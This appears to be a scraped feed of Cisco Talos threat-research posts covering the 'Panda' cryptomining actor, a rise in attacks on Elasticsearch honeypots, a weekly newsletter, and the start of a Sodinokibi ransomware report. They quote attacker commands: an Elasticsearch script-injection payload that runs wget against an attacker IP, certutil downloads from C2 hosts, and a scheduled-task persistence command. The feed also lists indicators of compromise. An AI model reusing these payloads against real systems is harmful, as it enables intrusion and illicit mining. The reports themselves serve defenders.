amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. 
In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in and, similarly, save it under another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files by running cacls.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. 
\n \nThe malware also issues a GET request to the Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp, which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe downloads the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempts to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. 
Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename, e.g., 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to the Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is that previously observed samples acquired the victim's internal IP and reached out to the Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. 
This sample installs WinPcap and the open-source tool Masscan and scans for open ports on public IP addresses, saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445, saving the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously used tools, launching Mimikatz to collect victim passwords. \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. 
The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda had added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. 
\n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Information from the HFS instances used by Panda shows that this malware had a wide reach, and rough calculations of the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the realized profit depends on when they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. 
\n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). 
\n\n\n## IOCs\n\n### Domains\n\n\n\n### IPs\n\n\n\n### SHA-256\n\n
\n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-01T16:16:02", "description": "_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. 
These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example, a CVE-2015-1427 exploit payload: \n\n\n> { \n> \"size\": 1, \n> \"script_fields\": { \n> \"lupin\": { \n> \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n> } \n> } \n> }\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. 
The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. 
\n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in Elasticsearch error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to GitHub or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on the Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. 
Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814, 36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. 
\n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \n \n**Second Actor:** \n \n**Attacking 
IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-09T20:20:13", "description": "_Newsletter compiled by 
Jonathan Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nIf you haven\u2019t yet, there\u2019s still time to [register for this year\u2019s Talos Threat Research Summit](<https://www.ciscolive.com/us/learn/programs/talos-threat-research-summit.html>) \u2014 our second annual conference by defenders, for defenders. This year\u2019s Summit will take place on June 9 in San Diego \u2014 the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register! \n \nThis was a heavy week for vulnerability discovery. Snort rules are loaded up with [protections against a recent wave of attacks](<https://blog.snort.org/2019/05/snort-rule-update-for-may-7-2019.html>) centered around a critical Oracle WebLogic bug. We also discovered vulnerabilities in [SQLite](<https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-remote-code.html>) and [three different Jenkins plugins](<https://blog.talosintelligence.com/2019/05/jenkins-plugins-vulnerability-spotlight-may-19.html>). \n \nFinally, we also have our [weekly Threat Roundup](<https://blog.talosintelligence.com/2019/05/threat-roundup-0426-to-0503.html>), which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we\u2019ve seen (and blocked) over the past week. 
\n\n\n### Upcoming public engagements with Talos\n\n**Event:** [Copenhagen Cybercrime Conference](<https://www.cyberhagen.com/event/39cd5ea8-2155-4d38-8128-34b457dc0e98/websitePage:645d57e4-75eb-4769-b2c0-f201a0bfc6ce?5S%2CM3%2C39cd5ea8-2155-4d38-8128-34b457dc0e98=>)\n\n**Location:** Industriens Hus, Copenhagen, Denmark\n\n**Date:** May 29\n\n**Speaker:** Paul Rascagn\u00e8res\n\n**Synopsis:** Paul will give an overview of an espionage campaign targeting the Middle East that we called \u201cDNSpionage.\u201d First, he will go over the malware and its targets and then talk about the process the attackers took to redirect DNS. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security. \n \n\n\n**Event:** [Bsides London](<https://www.securitybsides.org.uk/>)\n\n**Location:** ILEC Conference Centre, London, England\n\n**Date:** June 5\n\n**Speaker:** Paul Rascagn\u00e8res\n\n**Synopsis:** Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it\u2019s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker. \n\n### Cyber Security Week in Review\n\n * The city of Baltimore\u2019s online government operations were completely stalled this week [after a ransomware attack](<https://www.baltimoresun.com/news/maryland/politics/bs-md-20190508-story.html>). The city\u2019s IT director said the RobinHood malware forced the government to go \u201cmanual\u201d with many tasks. 
Emergency services have not been impacted.\n * A group of hackers [stole information](<https://arstechnica.com/information-technology/2019/05/hackers-breached-3-us-antivirus-companies-researchers-reveal/>) from three American antivirus companies. The group is offering source code and network access to the companies for $300,000. The companies affected have not been named yet but were recently contacted by the federal government to alert them of the breach.\n * Attackers [stole $41 million worth of Bitcoin](<https://www.reuters.com/article/us-crypto-currency-cyber-binance/hackers-steal-41-million-worth-of-bitcoin-from-binance-cryptocurrency-exchange-idUSKCN1SE0FK>) from cryptocurrency exchange Binance. A representative from Binance said hackers used a variety of techniques, \u201cincluding phishing, viruses and other attacks.\u201d\n * The tax services of Danish mega company Wolters Kluwer were [taken offline](<https://krebsonsecurity.com/2019/05/whats-behind-the-wolters-kluwer-tax-outage/>) this week as the result of a cyber attack. The outage specifically affected CCH, a cloud-based company, which caused \u201cnetwork and service interruptions.\u201d\n * WordPress\u2019 latest update includes a few [long-awaited security updates](<https://www.techradar.com/news/wordpress-revamped-with-new-security-features>). Each of the content management system\u2019s updates will now include digital signatures, and there is a new \u201cSite Health\u201d page for users.\n * Google\u2019s [latest security update](<https://www.androidheadlines.com/2019/05/google-pixel-may-2019-android-security-update.html>) fixed a number of vulnerabilities in the Android operating system, including several critical- and high-severity bugs. 
The most notable fix is for a vulnerability in Media framework that could \u201cenable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.\u201d\n * Cisco released [security updates](<https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-vulnerability-in-elastic-services-controller/>) for a critical vulnerability in the Elastic Services Controller. An unauthenticated, remote attacker could exploit this flaw to obtain admin privileges. \n * Israel [bombed the cyber headquarters](<https://www.forbes.com/sites/kateoflahertyuk/2019/05/06/israel-retaliates-to-a-cyber-attack-with-immediate-physical-action-in-a-world-first/#7508e855f895>) of Hamas in retaliation for an alleged cyber attack. Military involvement, in this case, has brought up several questions surrounding how cyber warfare could begin intersecting with physical retaliation.\n * A power supplier on the West Coast was [hit with a cyberattack last week](<https://www.eenews.net/stories/1060281821>). The attack did not cause any loss of power for customers but did prevent visibility in some parts of the country. \n * Cyber firms are increasingly turning to [non-traditional sources of recruiting](<https://www.wsj.com/articles/cybersecurity-jobs-abound-no-experience-required-11557394201>) as the industry looks to fill a talent gap. Some companies are training researchers on the go, even if they do not have a traditional security degree.\n\n### Notable recent security issues\n\n**Title:** [Attacks using WebLogic bugs expand, evolve](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) \n**Description:** Attackers continue to spread malware by exploiting a critical vulnerability in Oracle WebLogic. The bug, identified as CVE-2019-2725, was disclosed and patched last week. 
However, as users have been slow to update, attackers are still able to exploit this vulnerability to deliver the Gandcrab ransomware and the XMRig cryptocurrency miner. \n\n\n**Snort SIDs:** 50014 - 50025\n\n \n\n\n**Title: **[Cisco discloses 41 bugs, one of them critical](<https://www.sdxcentral.com/articles/news/cisco-issues-largest-single-day-security-vulnerabilities-in-at-least-12-months/2019/05/>) \n**Description: **Cisco released a security update for several of its products, including one critical bug in the SSH key management for the Nexus 9000 series Application Centric Infrastructure (ACI) mode switch software. An attacker could exploit this vulnerability by connecting to the affected system over SSH, which could give them the same privileges as the root user. \n**Snort SIDs:** 49992 - 49996, 50006, 50007\n\n### Most prevalent malware files this week\n\n**SHA 256:** [3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/#/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5:** 47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename:** qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name:** Win.Trojan.Generic::in10.talos \n \n**SHA 256:** [15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/#/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5:** 799b30f47060ca05d80ece53866e01cc \n**Typical Filename:** 799b30f47060ca05d80ece53866e01cc.vir \n**Claimed Product:** N/A \n**Detection Name: **W32.Generic:Gen.21ij.1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/#/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **Tempmf582901854.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n \n**SHA 
256:** [7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510](<https://www.virustotal.com/#/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details>) \n**MD5:** 4a50780ddb3db16ebab57b0ca42da0fb \n**Typical Filename: **xme64-2141.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.7ACF71AFA8-95.SBX.TG \n \n**SHA 256:** [9d48f382ec11bd9b35488a2c2b878e5401c2be43f00bcbae30d1619e6e2bf0c1](<https://www.virustotal.com/#/file/9d48f382ec11bd9b35488a2c2b878e5401c2be43f00bcbae30d1619e6e2bf0c1/details>) \n**MD5:** dd46d0260a6cdf5625d468398bae1f60 \n**Typical Filename:** N/A \n**Claimed Product: **N/A \n**Detection Name: **Win.Dropper.Undefined::tpd \n\n\n \n\n\n", "cvss3": {}, "published": "2019-05-09T11:00:02", "type": "talosblog", "title": "Threat Source newsletter (May 9)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-09T11:00:02", "id": "TALOSBLOG:7A681329F7813E49DED3E928ED08D453", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/UnDh7UQFE9M/threat-source-may-9-19.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-01T20:19:50", "description": "_This blog was authored by [Pierre Cadieux](<https://twitter.com/pchobbit>), [Colin Grady](<https://twitter.com/ColinGrady>), [Jaeson Schultz](<https://twitter.com/jaesonschultz>) and [Matt Valites](<https://twitter.com/matthewvalites>)_ \n \nAttackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called \"Sodinokibi.\" Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>). 
This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least [April 17](<https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+Alert+WebLogic+Zero+Day/24880/>). Cisco's [Incident Response (IR) team](<https://www.cisco.com/c/en/us/products/security/sas-incident-response.html>), along with Cisco Talos, are actively investigating these attacks and Sodinokibi. \n \n\n\n[](<https://1.bp.blogspot.com/-t1wvTOXYM88/XMhzOJSlmXI/AAAAAAAAArU/FsmHYMLu7AQSS-RIQINEePUnlqgPqY0xQCLcBGAs/s1600/image6.jpg>)\n\n \n \nInitial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. This was a trial to see whether the server was exploitable. \n \n\n\n[](<https://1.bp.blogspot.com/-dr0gPLkwXUA/XMhzTOvpdHI/AAAAAAAAArY/xF0IZnQxKngebF4N2qS-IoQywRG_5f9VACLcBGAs/s1600/image4.png>)\n\n_April 25, 2019 activity showing the initial activity preceding the ransomware deployment._ \n \n \nOn April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the 